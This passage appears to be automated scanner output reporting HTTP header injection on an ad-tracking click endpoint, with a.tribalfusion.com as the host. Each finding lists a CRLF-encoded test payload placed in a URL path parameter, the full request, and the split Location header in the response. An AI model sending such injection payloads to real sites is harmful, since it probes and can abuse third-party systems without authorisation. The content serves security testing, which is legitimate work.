Set-Cookie: ANON_ID=a8nEV8w5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavelUaq0NZdkPZckBA4Zcd6lNMdrLHxBwXkycGkqOJlYBja8gOleVRm2ivlMbVZaKP9qZbkHUTSkrmB0OK87lcTpMBNt5pZdH3dwj59753I4SfqStkZc1In9Zb3wCYoLWZcCr8l3al8tUH3edHr9ARTxOma0idF0YU013mif8S3fZbETZasQSP3IGtQ6UZbjfwTYqj8Vxlf9GaKT8ADt4dXpafqxqFqjeKygn3TRv8ZdXZaVxXn8tfvyF0EFo6g6rc30bfjqaXxsCrgZcujOZaJUCZci44lTlE5ySg2G8rW2dWNe4kNeO6rlTME9OeJFYDZdusQnd5dT16xhNoNWHJBcb0LBJZcTrAAFOENtZbBMH75JT6TWH7pV5bjdL; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/519bd
f6f1a5ca6fc/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload 8383b%0d%0afea7a730776 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/8383b%0d%0afea7a730776/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aenEV8u4YUMPqcnl3fo2nXr9nGUdfSJS2ZdVl4PQL5cvjQ0JVjd5Wv1wo62492SGtZcIFuTJWapG0M4e17yOwT3noFCfFtccd14rv6kgVvYtBicKsCfDHZaV8isHWaytmpLetKYJZcA0Cm2GeZdsGijIwE6kIqV53ZcBRnDyJZa8ZcU6QdNsP0muZaZbCkX5mVKnY2rquSCaoBtoaRU4uU8o36LGojATkET033RI2ZalVdl5Hc4srLr0topddihKZcZbURvbNYBZc61j8g40o3ngaZbruDxbZbm5k3mqDGpRMpVxsc6dqfw70Ympdh0sZcVwm9ZdtM8xZbrZdUiJ1A377GUoAFJWw9Y6wd9fohMTMwbHbIe6epu9XtLsZbKSANS1nusarnAZataeyAdU05snV7j692RaQoAZbPNlCdVrwVbATMf1R4TuvNDFjDvxa7tU60foH4w0a0m0Ik2EdRG2W8hm2jiZdolZbXX3vklqLtEikydR7SKR2kDIrZc2U1TZcZcrGikb9W2vR62BX5402ZdUguWTBHmqPiqTWErlK4PsiW3i7sZb2fM6db7HZdE54vWflRHJp6YTlHT79JJMkMx; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:51 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/8383b
fea7a730776/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload a51c3%0d%0a7eebecdec02 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/a51c3%0d%0a7eebecdec02 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnEV8y4Zaw57A9MZdJSniFWrVJyqqMW8PmwTOGURXZcKVvUT7V3KRVjYSTZaLr9EXFa45Ff2q2VosRMGwwPygpqvVwTRKEGclAlCXuDg9XfbwC2hauVBwGKcU7V53b2ZdITZaQsJZdJCHv8Y2PZbXOm2dKKyXduyqPOoQNpDsBXZck2Cr8xEXoqI6jALbTtskA1OjxxpNdURkqgoqCrcGu5mlIyengZcajK42cy0icDZc3o1aZcgxFtsrs6SuaiK4ZdH1N7yMTZdBtOahR3s3aFGyBMZd1ntpl0RmBxyRBftMu0S8tiivoLr5d9bosNxtnqZb3LZcicrW4l0LW3mfx4ABrBQ8suQwogJVZarFjYasbBZdTq4vA2NFcnHPmpMUbPZdbpBtBWy8M65jMXZdmUtjiaOoZbQab0YI5IbcZbC5UIsoLdCoVupsWfZbK157aF3I4Y4d25dl3PNviO2eQc6TFuf09Zakk8NyR5fK7wZcGwZaZcFtQ6dNTydV7H9AWLIAAtgkgsWITNRm4SQX0Xu0TLTFRALtmPv1scmm9gKgr29RiTZctMwfaZacZboZbTH1wEuDMSZbMCbaChUr7udrNtI; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:08 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/a51c3
7eebecdec02
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 591e6%0d%0a985b0b0017d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/591e6%0d%0a985b0b0017d/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aAnEV8qO2cur2OqNvhrZbroT7rI4FbUGtyAUZbK7Wwpt3JAeZcprc0mvJVbE8royfFWxpH2XnUbkRQ1kDMoaYmCnYNEC8KE8HLgxSpBGZdVe7VHuG1rP3PG59clGpZce3hWxkjOcIyaAxdATQ7wvPTJGgmjAu7UQ34gxps6ZdvwqPoImurPwoLmyGJTwUE4W2yM0yo16w7Zdli8M9YU4OWDZdjt5FrZaD2txZbVjmZccaKZacY93kuIRGNRAtlg3gScTZdShln1dQL3cgCbNyqY7e37GgBZdtZcgtQsHIumnrY5Vf9F6XyPsITWsY3SVWOW93X0VFcalllfkx5FjNWp3QCvKZdND8BfO4DnUMngq7fEQZbUoCmRLdrhUT4CX9ZabbcEEZdHPnm7xoRwpvwmXK9MtTYbJu5eWcfGBtuUUWpfLvtVZbbus3WGh8pdqUAX0Zcs03VBO8ZckhyZaJVdFSgLIBb2dZdZcZbaUW0gEnvobZcfqKqnWlN4dnbVtCPXZaDZbR0bZcVp50ZdoMtAFrPLqUy1edPB1ZdunfHQoiig1wRnMStZb9oDWLnceBBIZacLlOcFNs9XBeiikgp7nsaMfjw; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:44 GMT;
Content-Type: text/html
Location: 591e6
985b0b0017d/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 83775%0d%0a107c0b40884 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/83775%0d%0a107c0b40884/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aWnEV8ujie4R7Yx039x3UbQmfPRT7ZdCH2B22Zcf00DaT2mgHWUt2EZbi1cIXypihaF5uKxuE3Fcd1uHU0pjEwc2XtE8mZctg1IOkiVRpKThvRZcJkmOSUnZaZcl8la1lg4Zd1p2ESc0Y6I0wZbQoBJtCq7GNXuCLE72O0esQ8VciKVxP3tXWmNw0yZcZbJjSwnsgM2j6MmtGyS53eAbAXU0fS95Xq3J9hDT80ZdRGSlCPGONZbb3dNBo0LODSNgZcZcKhCcOlvFCGbZdJdeKGokEWHZd6HJZcbHv4K6Td1Pq7rl3lsegTaPnmG13CG1TtsGv9TuVJ0OlbOjZcxKmR8ZbL5SUaI294YCh291pCuU39kHfrHEXgWQFWJajl2bsfR6EEltIAZdbuPo85N0I0Uw8MZch2gY2GfLQwtZcfRf8wcm9NLZdxwqYSQ9jrjJtqHVrEPLCEQ3lePWcSK22pWbfrivXp7NOiZdZb6DSwwnoxNpffy5UpSE3ODFfblVVXFFEoGP9UWZc02VawViYT3AZa3lipQDSiq9YJtUQKbO40Ojp6Iok110ryin7JFtZddoGrjOseDY1Iy5HUT3cVnZck; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:59 GMT;
Content-Type: text/html
Location: http:/83775
107c0b40884/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f3296%0d%0a30ce56375d6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/f3296%0d%0a30ce56375d6/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEV8xZduBwoApTwrxUjYrtQJqXsQZaZb6fZbVxooN01mQOFIJFMXPVMoxcmDomur8rVZdZdyuy0WcfT1gSx9ZaZcvbZbSMD8ZaDH4CZc0gemFHZa4ibQGZawTwQBjZaM05ZacZcP6hZdQw36kCJBsZdfoQ0cBHMnaXZblEwlwbQRN8urCV7Hu8RYAjZdwb7ZcrYPDHeuoxqlWyZcy1MCslvROE9AfMtngmyQCusZdfGac2XS4kqXjxPFj8rhO5UBbslSADP8ZcstcsZdvkM3ZcI7SQLhwnnZaPN9lBjckZb5WkGmoGxqNDFiRIDa6pXLUm4ZdX7pv0b4frnccrY8a7chpILDHWbZbpXBUgHxZc5uRKV6X8JoR359t3iB72knGnQD9niT68ZbW8PXlEMMidjluW5qSJNe4nbXil8FWRfF1Jdt8Dr6WWQSmKthvdjamtFnZdYHZabaaq5IkJ1ywJQROkLZcZbIWWe2fuuggNpQ6fP0yIdQmf4VcZaqb28lsVMwFgtpkXwMkEbgqZdVH6R2kYt8F5UYXAShmhMA91tBZb6Srm6K5sCQ3OmkSZcOQuFO9VTFZdPpyVGjvwU37Yr6SmUbKjINBMD; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:16 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/f3296
30ce56375d6/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload e3982%0d%0a98884cd2344 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/e3982%0d%0a98884cd2344/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=awnEV8yOZbS5RJTyZcqJuZa3ATPUn1CUg8mBZd3i05WKW0PirnKHZapXrZbZc5dIZcvRqNEFswIfiVSWGE0foKqmufRGJ9oVRVKs8ZdcZdZcgUpKZaoxBmLeKOxnyiJg8YZaqtcdZbdRyZbIRZafngf1sjU9BfNSPLZd0XN812uTiCyo7KxZb10l2sYNscX8OLyiEZcnWx7CE2Jrkv7S9O81LD7ADs78kQAtksNnAhbITX1obWkKmCMVe9ZdCNAcRBr71E9ZdCZaia1H72mSECSlif8csybiGZdIKZc0ZajwZdCFQHdnMtBKMXhchamcy6RbYoDAYdlCMRUKM0WhKbAavymUrLuj2h7HtqdiqlxuRWZbeFplNVyjhXOZdSfQxAwUNZcCxRgMykqGRfUwLAWIUpIUFgwOGbpRlhWGQYWPn5oHbQoqnxgBnqQQW4Zc7GnOYS8lF3RGSaSD0tnt5SPgogZbD4G9aDaSAQw390LmIYapwI9QMQjk1KCImXZcYeuSZdxWHAe8ALRTWITcOOZaUSxetZacMYTZb24Jur0g1JaReIMdx17aNo2gnCRMq1q5XHfgbTIEQMidQXrDQuZbsUsetklga; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/e3982
98884cd2344/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
